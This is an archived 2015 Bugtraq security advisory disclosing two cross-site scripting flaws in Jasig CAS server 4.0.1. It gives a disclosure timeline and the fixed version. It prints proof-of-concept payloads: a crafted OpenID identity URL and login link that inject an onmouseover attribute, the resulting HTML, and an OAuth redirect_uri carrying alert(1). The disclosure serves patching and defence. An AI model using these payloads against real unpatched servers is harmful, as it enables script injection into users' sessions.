bugtraq - Jasig CAS server vulnerabilities

lists.openwall.net		lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC
Open Source and information security mailing list archives

Hash Suite: Windows password security audit tool. GUI, reports in PDF.

[<prev] [next>] [day] [month] [year] [list]

Date: Mon, 21 Sep 2015 14:53:42 +0200
From: Antoni Klajn <antoni.d.klajn@....edu.pl>
To: bugtraq@...urityfocus.com
Subject: Jasig CAS server vulnerabilities

Hi,

Jasig CAS server version 4.0.1 is prone to xss vulnerabilities

Timeline:

20.02.2015 - Vendor notified
11.05.2015 - Patches released
21.09.2015 - Bugtraq disclosure

Vulnerable version:

4.0.1

Fixed version:

4.0.2

Vulnerabilities details:


1) XSS in OpenID server


Obtain method:
Paste thi url
https://oauth.example.com/cas/openid/username"[new line]onmouseover="jscode
in OpenID client and try to log in.
space char is not allowed, you can use new line

Example redirection link
https://oauth.example.com/cas/login?openid.assoc_handle=1422619970824-0&openid.ax.mode=fetch_request&openid.ax.required=email&openid.ax.type.email=http%3A%2F%2Fschema.openid.net%2Fcontact%2Femail&openid.identity=https%3A%2F%2Foauth.example.com%2Fcas%2Fopenid%2Fusername%22&openid.mode=checkid_setup&openid.return_to=https%3A%2F%2Fclien.example.com%2Faccount%2Fsignin%2Fcomplete%2F%3Fnext%3D%252F%26janrain_nonce%3D2015-09-21T11%253A15%253A10ZiTDjrd%26openid1_claimed_id%3Dhttps%253A%252F%252Foauth.example.com%252Fcas%252Fopenid%252Fusername%2527&openid.trust_root=https%3A%2F%2Fclient.example.com%2F

Result
<input type="hidden" id="username" name="username" value="username"
onmouseover="jscode" />

2) XSS in OAuth server

Example link
https://oauth.example.com/cas/oauth2.0/authorize?client_id=<client_id>&redirect_uri="onmouseover=alert(1)%20.trusted-domain.com